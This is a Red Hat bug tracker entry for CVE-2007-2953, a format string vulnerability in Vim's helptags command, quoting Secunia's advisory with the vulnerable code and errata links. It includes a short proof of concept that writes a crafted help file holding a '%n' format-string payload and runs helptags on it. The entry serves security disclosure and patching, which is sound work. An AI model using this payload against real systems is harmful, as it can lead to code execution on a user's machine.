Bug 248542 (CVE-2007-2953) - CVE-2007-2953 vim format string flaw
Summary: CVE-2007-2953 vim format string flaw
Status: CLOSED ERRATA
Alias: CVE-2007-2953
Product: Security Response
Classification: Other
Component: vulnerability   
(Show other bugs)
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: reported=20070717,source=secalert,pub...
Keywords: Security
Depends On: 453541 453542 453543 453544 453545
Blocks:
TreeView+ depends on / blocked
 
Reported: 2007-07-17 12:19 UTC by Mark J. Cox
Modified: 2009-06-11 12:53 UTC (History)
3 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2009-01-09 08:38:07 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2008:0580 normal SHIPPED_LIVE Moderate: vim security update 2008-11-25 08:41:07 UTC
Red Hat Product Errata RHSA-2008:0617 normal SHIPPED_LIVE Moderate: vim security update 2008-11-25 08:57:54 UTC

Description Mark J. Cox 2007-07-17 12:19:11 UTC
Secunia Research has discovered a vulnerability in Vim, which can be
exploited by malicious people to compromise a vulnerable system.


Vulnerability details:
----------------------

A format string error in the "helptags_one()" function in src/ex_cmds.c
when running the "helptags" command can be exploited to execute
arbitrary code via specially crafted help files. The "helptags" command
creates a tag file from tags surrounded by asterisks in help files, and
the part of the code that handles tags starting with the string "help-
tags" is incorrect, leading to this vulnerability.

The offending code in src/ex_cmds.c looks like this, starting from line
6353:

            s = ((char_u **)ga.ga_data)[i];
            if (STRNCMP(s, "help-tags", 9) == 0)
                /* help-tags entry was added in formatted form */
                fprintf(fd_tags, (char *)s);

Successful exploitation requires that the user is tricked into running
"helptags" on malicious data.

The vulnerability is confirmed in versions 6.4 and 7.1, as well as the
version included in Fedora Core 6. Other versions may also be affected.


Proof of Concept:
-----------------

Here is a simple PoC:

$ mkdir secunia
$ echo '*help-tags%.1111111111u%x%x%x%x%x%x%x%x%n*' > secunia/help.txt
$ vim -c 'helptags secunia/'
or
$ vim
:helptags secunia/


Closing comments:
-----------------

We have assigned this vulnerability Secunia advisory SA25941 and the CVE
identifier CVE-2007-2953.

Credits should go to:
Ulf Harnhammar, Secunia Research.

Comment 1 Tomas Hoger 2007-08-15 10:02:58 UTC
Issue is public now, lifting embargo.

Comment 8 Red Hat Product Security 2009-01-09 08:38:07 UTC
This issue was addressed in:

Red Hat Enterprise Linux:
  http://rhn.redhat.com/errata/RHSA-2008-0580.html
  http://rhn.redhat.com/errata/RHSA-2008-0617.html


Note You need to log in before you can comment on or make changes to this bug.